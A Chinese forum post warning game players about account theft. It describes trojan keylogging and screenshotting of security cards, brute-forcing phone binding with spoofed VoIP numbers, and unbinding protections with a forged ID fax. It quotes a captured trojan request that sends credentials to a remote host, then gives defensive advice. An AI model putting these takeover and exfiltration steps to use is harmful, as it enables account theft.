-
关注Ta
-
- 注册时间 2008-11-07
- 最后登录 2014-02-01
-
- 发帖4532
- 在线1970小时
- 精华0
- DB25
- 威望5365
- 保证金0
- 桃子0
- 鲜花0
- 鸡蛋0
-
访问TA的空间加好友用道具
|
望盗过的没盗过的还有正在被盗着的都关注一下,提高一下自己的防范意识
首先,中木马玩家一旦运行游戏,就会自动激活盗号程序,关闭你的杀毒软件和防火墙,自动通知远方的盗号者准备开始行动。
一、虚假官方提示骗取
木马先强行踢玩家下线,再发一个虚假官方提示,告诉玩家的密保卡已经损坏,被解除绑定之类,并要玩家输入三个密保卡字母对应的数字。
其实这三个数字正是此时盗号者的登陆界面需要输入的三个数字(他已破解你的登陆密码),一旦玩家输入,号被盗也是情理之中了。这种木马的危害较小,只要不输入任何东西就可以了,这个木马也是官方介绍过的。
二、反复T下线记录
这个是破解密保卡的“常 规手段”,通过反复踢玩家下线让他不断输入坐标,再通过木马的截屏功能逐步搜集密保坐标及其对应的坐标数字。诛仙密保输入的数字是明码的,通过截屏就能知 道你的A1、B2等等是什么数字。只需要知道60%以上的数字对应就可以完成破解,这种专破密保的木马叫“矩阵终结者”。
三、长期“常规”记录
短期反复踢玩家下线容易引起玩家警觉,若玩家长期没有更换密保卡,即使是平时的正常操作也会让马夫们逐步分析完你的密保卡对应数字,一旦达到60%就能实现盗号,所以这就是大多数游戏的密保卡只能保你30天的原因。我的到了第33天就顶不住了……
一旦突破你的防范,用分类软件1分钟拿走你的所有东西,根本无须人工操作。
完美最近推出了电话密保,那么电话密保用电话密保怎么又会被盗那?
破解之一:
盗号者在盗到号(这里指账号和登陆密码)后做的第一件事是先去检查一下有什么密保
如果是电话密保,OK了,开始破解
打开电话密保的网页,用盗来的号登陆后,会显示出绑定的电话
格式如1111***111
隐藏位数只有三位
也就是只有1000种可能
不要对我说电话在你的手里,盗号的号码和你不一样
有一类软件叫做网络电话
几年前我做系 统维护时曾有人给我推销过,并赠送了20元的话费
当时我试着把本地电话设成某比较小的三位数字#17
然后给朋友打了个电话,说怀疑他与一宗绑架案有关#76
结果他吓得差点吐血#83
后来我往我自己手机上打了一个,电话号码只有三位数#83前两位的数字是同一个#76
不过电话密保打电话是免费的,所以盗号者没必要去交话费就可以直接操作
破解之二:
二、第二种方式解除电话绑定(客服已确认):
传真身份证复印件至完美,说明原因并要求解除电话绑定即可。
方法简单吧,让你吃惊了吗?客服姐姐给的理由是如果你的帐号被别人恶意电话绑定,使用这种方式就可以解除。对于这种解释我要对大家说自己的证件号码一定要保管好啊。
关于以前有人使用“手机绑定”、“电子密保”绑定功能被盗的步骤,有人已经很详细的解说了。在此再重复说一次,并对一些认为盗号者不知道邮箱为什么能改密码等疑问一并解释。
三、盗取使用“电子密保”玩家的步骤:
1、通过种种渠道获取你的帐号与密码,登录官方网站,查看你的注册身份证,身份证号码隐藏部分可通过用户填写的出生日期获取;
2、PS一张假身份证至完美,要求解除密码绑定;
3、登录游戏(或者通过网页修改密码后再登录游戏)进行盗号操作。
有人问为什么我在邮箱里看不到盗号者修改密码的信息,他们是怎么更改登录密码的?甚至还有人抓住这一点来怀疑是官方内部人员操作的。其实常混多玩的都知道,在修改游戏密码是可以绕过邮箱验证而直接更改密码的。操作步骤如下:
1、登录通行证;
2、直接输入http://XXXXXXXXXXXXXXXXX (屏蔽防止被别有用心者利用)网址即可修改登录密码。
四、总结与建议
综上所述,当你已经被盗号者获知你的有效身份证号码后,你就无法摆脱被盗的命运。因为完美所推出的这几种绑定服务,均可以通过传真身份证复印件到完美公司直接申请解除。
由于不能修改注册时的身份证号码,又因为所有绑定都可以用身份证号码解除,所以只要别人拿到这个资料,就算电脑100%安全也没用。在强调一下注意帐号资料安全啊!!
看了上面的分析,你就会知道你的所谓防范在中马之后是多么脆弱,俗话说不怕贼偷,就怕贼惦记,中了马之后贼开始惦记你的电话密保和密保卡了,破解只是早晚的问题,请相信,
中了木马之后还能够保证你账号绝对安全的措施不存在,最好的办法就是提高警惕,重在预防。
键盘录入的所有信息都是可以被记录的,软键盘输入的信息会被截屏,内存会被读取,密保卡有“矩阵终结者”、电话密保有“网络电话”,以上还不行,就需知道你的身份证号码!
最后,你的所有被盗物品都会很快出现在5173或者拍卖行,这个最大的被盗虚拟装备销赃基地,被其他玩家迅速买走……
在这里再说一下,如果物品放在拍卖了最好自己先凑钱把物品买回来,如果你开了协查函或者使用完美找回,完美公司可能会给你追回相应的金钱,如果你是傻等那么........阿门祈求上天吧!
防范办法还是说烂了的老三样:
1、装好杀毒软件保持最新,装好360之类的安全软件,及时修补漏洞,扫描木马;
2、只上正规大网站,多使用网页快照;
3、拒绝任何不明连接、不明软件,下载完毕之后立即扫描病毒木马。
4、做好以上三样还是会被盗的,特别是被盗过的玩家,由于盗号的掌握了你的信息比较多,再次破解的难度会大大降低,所以让我们求求额滴神,不要被盗吧!
五、说GM盗号的
我觉得这些人真是无聊透了,好听点可以说没文化,你自己冷静下来想一想,他们如果有能力盗你号还不如自己刷装备又没风险还快速!万一调查起来这是可不是闹着玩的,想一想挺可笑哈,自己不注意安全就别怪人家,账号在自己手里人家又不是天天给你看管着,自己又不是小孩,说话要负责的嘿嘿,完美推出了密保卡,电话密保,手机密保,其实已经不错了,剩下的就要靠自己了。
六、帐号被盗后物品找回的问题
帐号被盗了,完美是在你开出协查函或者使用完美找回的时候才会有这个义务尽量的帮你追回物品的,注意是尽量!因为完美没有这个责任百分之百为你找回因为某些东西是无法找回的.....比如消耗掉的,砸碎的,丢失的,正常交易的等等,现在是法制社会万一物品引起争执完美也不好承担责任毕竟咱们的法律还不健全啊!
总之希望大家看完这些有所收获谢谢
顶不顶没关系 但是顶顶更健康啊!!:loveliness:
发帖过去一阵子了发现大家都说完美盗号严重,看大家的关注程度貌似这种说法是假的:lol
无论怎样 我还是要 再补充点 为需要他的人
一些盗号的原理是直接改内存地址,没有防封处理,所以400版完美的动态检测躲不过去。
其实原理和功能都很简单,做这个的人主要是为了传播木马。在norton病毒库被命名为delf.bg。中文名字是德芙木马下载器。它的作用是每次开机以后,远程下载木马,它本身不含病毒程序,但是它会负责下载病毒。
小飞的木马基本原理是在**里绑一个木马下载器,然后定期到小飞作者指定的几个地方下载完美破解木马。这些木马会自动把你的用户名、密码和密保卡发邮件到他指定的信箱。
我用小号测试,发现会往外发这种包
GET /wwmm/Faxin.asp?Server=网通逆鳞&UserName=**********& Password=********&PCName=**********&ToMail=****@163.com HTTP/1.1
Host: [url]www.********.com
(熊猫挂)400版有些版本是没病毒的,但是400版以后的基本都带有木马,原理和上面小飞的一样,估计是同一批人做的。
如果你用过**,请你即使更换自己的密码和密保卡。
1.下载实时杀毒的软件,瑞星、金山、卡巴……都可以
2.使用360安全卫士和360保险箱,360保险箱现在提供完美的保护,每次启动完美它都会自动扫描和实时监控
3.利用IE浏览器中的一处安全缺陷,任何网站都可以在用户不知情的情况下随意拷贝Windows剪贴板中的内容。解决方法——通过点击IE浏览器中的“工具”->“互联网选项”->“安全”->“自定义级别”,找到“脚本”小节,禁用“允许利用脚本进行粘贴操作”。
4.去网吧的时候,先下载一个软件,然后重启,看看你下的软件还在不在,以此判断网吧是否装有还原卡或者**还原软件。
5.到网吧玩,最好登陆游戏之后立刻修改密码,这样就算内存里的帐号和密码被盗,他也登陆不上去。
6.别说什么GM盗号这种没文化的话。
关于游戏帐号的一些安全知识。
首先我们先说下盗号的木马.木马一般会有一下几种功能:
1.按键精灵,就是在你运行一个网络游戏的时候在输入游戏帐号和密码的同时,会记录下你键盘按过哪个键.
2.屏幕拍照,所谓道高一尺魔高一仗,你输入游戏帐号和密码不使用键盘了,按键精灵就会失去作用,所以这个功能就大显神威了,它会以屏幕刷新率的速度对屏幕进行拍照,来记录下来你鼠标的运行的轨迹.
3.强制离线,这个功能主要对付那些会有安全比较完善的游戏什么的.这些游戏一般会带一张2维矩阵的数字卡.在登陆游戏的时候,输入上面的数字.每张卡上面的数字是不一样的.所以木马会定时强制玩家离线,然后再利用上面2个功能,记录矩阵数字.
然后我们说下预防措施.这个也就是所谓的见招拆招:
1.按键精灵:对付这个功能唯一的方法就是不使用键盘.但是,也不要使用游戏提供的软键盘或者输入法的软键盘.因为屏幕拍照功能在等着你呢.那我应该怎么做呢?在运行程序之间.新建一个记事本.然后在上面胡乱输入数字,字母等,用鼠标按照自己的密码一个一个的复制上面的字母出来,排成完整的密码.整个复制,关掉记事本.运行程序,在输入密码的位置粘贴上密码.这样按键精灵根本发挥不出来作用.同时废掉了屏幕拍照功能.
这个有的朋友会说了,我在外面建立记事本就不会被上面的功能记录下来吗?
个人感觉现在大部分的木马都是植入型的.也就是说它会植入你要运行的那个程序里.并伴随程序一起启动.程序不启动木马不启动.这个也是为了自身安全着想,一直运行着很容易被杀毒软件抓出来.
3.强制下线:个人感觉这个没办法.最好的防护措施:如果你在网吧玩游戏出现这种情况.那立刻换机器,并更改密码等信息.如果是家里,只能更新最新的杀毒软件,并检查网络是不是网络问题导致的掉线频繁.
下面我们来说下如何让2维矩阵数字卡的对帐号保护的更好.
这种卡片.会很大程度的保护你的帐号安全.但是,它仍然存在很多问题.首先利用屏幕拍照和强制下线很轻松的记录下来你卡片上的数字.有人说了我们在输入的时候是字会变成暗的.那其实就是个心理安慰.对于刷新率比较快的木马来说根本不算回事.
解决方法,定期更换卡片
死伤,个人认为这种防护措施有个死伤.因为没有办法解决.2维矩阵数字卡上面的数字是计算机通过算法算出来的,而且不能解决委随即数.所以一旦那些心怀叵测者知道了算法.那就跟自己的帐号告别吧.举个最简单的例子:你知道2乘3等于6.2和3通过什么方式能变成6.这是同样的道理,盗号者通过大量的计算是可以算出卡片上的数字的算法的.这样知道很少的数字就能算出整张卡片上的数字.
关于邮箱.
这个怎么说呢.大部分的网络帐号和游戏帐号都提供帐号密码的邮箱取回.有几点建议,对于这种专门用来取回密码的邮箱建议大家单独申请个,毕竟越少登陆,危险越小.一些安全问题啊,密码什么的,尽量的复杂一点.别设那种都不用动脑子,就能猜到的东西.
最后,希望大家在往后的上网,游戏的时候能更小减少损失..小心使得万年船.毕竟每一个游戏帐号,或者网络帐号都跟自己的孩子一样是有感情的.
|
